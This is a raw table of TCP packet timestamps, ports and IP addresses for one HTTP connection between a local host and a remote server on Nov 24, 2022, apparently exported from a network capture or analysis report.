Nov 24, 2022 12:19:59.873801947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873831987 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873847008 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873862982 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873891115 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873919964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873934984 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873951912 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.873963118 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.873982906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874013901 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874027014 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874044895 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874074936 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874087095 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874105930 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874135971 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874165058 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874180079 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874195099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874209881 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874226093 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874258041 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874286890 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874303102 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874316931 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874332905 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874349117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874378920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874391079 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874408960 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874439001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874469042 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874485016 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874499083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874514103 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874531984 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874562025 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874589920 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874591112 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874619007 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874633074 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874649048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874654055 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874677896 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874686956 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874710083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874739885 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874769926 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874785900 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874799013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874811888 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874830961 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874860048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874872923 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874907017 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874937057 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874965906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.874988079 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.874996901 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875014067 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875029087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875058889 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875088930 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875117064 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875118971 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875148058 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875149965 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875181913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875211954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875238895 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875241995 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875263929 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875274897 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875308037 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875338078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875355005 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875370026 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875401020 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875415087 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875439882 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875446081 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875469923 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875471115 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875502110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875534058 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875557899 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875566006 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875590086 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875598907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875602007 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875632048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875662088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875688076 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.875691891 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875724077 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875754118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875782967 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875811100 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875840902 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875871897 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875900984 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875930071 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875960112 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.875988960 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876018047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876048088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876079082 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876108885 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876138926 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876161098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876161098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876161098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876161098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876161098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876161098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876161098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876161098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876169920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876198053 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876198053 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876203060 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876234055 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876265049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876281977 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876296043 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876329899 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876348972 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876360893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876369953 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876393080 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876422882 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876452923 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876465082 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876482964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876509905 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876513958 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876527071 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876544952 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876575947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876588106 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876607895 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876637936 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876646996 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876662970 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876668930 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876679897 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876701117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876732111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876760960 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876775026 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876791000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876797915 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876821995 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876852036 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876874924 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876882076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876913071 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876944065 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.876966000 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.876975060 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877000093 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877007008 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877038002 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877068043 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877087116 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877099037 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877120018 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877131939 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877162933 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877192020 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877213955 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877223015 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877244949 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877254009 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877285004 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877296925 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877315044 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877325058 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877347946 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877368927 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877377987 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877409935 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877439976 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877463102 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877470016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877500057 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877501011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877532959 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877563000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877568007 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877593994 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877626896 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877641916 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877656937 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877690077 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877701998 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877720118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877751112 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877768040 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877782106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877799034 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877813101 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877844095 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877872944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877883911 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877902985 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877909899 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.877934933 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877964020 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.877995014 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878006935 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878025055 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878041983 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878065109 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878065109 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878098011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878129005 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878137112 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878160000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878163099 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878190994 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878222942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878235102 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878252029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878283978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878314018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878324986 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878345013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878353119 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878376007 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878406048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878420115 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878436089 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878465891 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878480911 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878494978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878525019 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878554106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878582001 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878583908 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878609896 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878616095 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878645897 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878675938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878688097 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878705025 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878712893 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878736019 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878766060 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878774881 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878797054 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878828049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878858089 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878871918 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878901005 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878906965 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878932953 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878962040 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.878976107 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.878993034 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.879021883 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.879036903 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.879055023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.879093885 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.879812002 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.880012989 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.897613049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.897696972 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.897746086 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.897790909 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.897803068 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.897835016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.897882938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.897885084 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.897928953 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.897974968 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.897977114 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898015976 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898020029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898062944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898108006 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898108006 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898149014 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898214102 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898221016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898267031 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898310900 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898355961 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898370028 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898401976 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898444891 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898462057 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898489952 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898494959 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898535013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898580074 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898588896 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898628950 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898673058 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898678064 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898715973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898760080 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898802042 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898804903 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898844957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898894072 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898910046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898955107 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.898956060 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.898999929 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899045944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899054050 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.899090052 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899132967 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.899133921 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899178982 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899220943 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899264097 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899264097 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.899307013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899347067 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899348974 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.899384975 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.899393082 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899436951 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899477005 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.899482012 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899528027 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899570942 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.899570942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899619102 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899662971 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899705887 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.899705887 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899751902 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899792910 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.899794102 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899837017 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.899879932 CET	49708	80	192.168.2.3	66.235.200.147
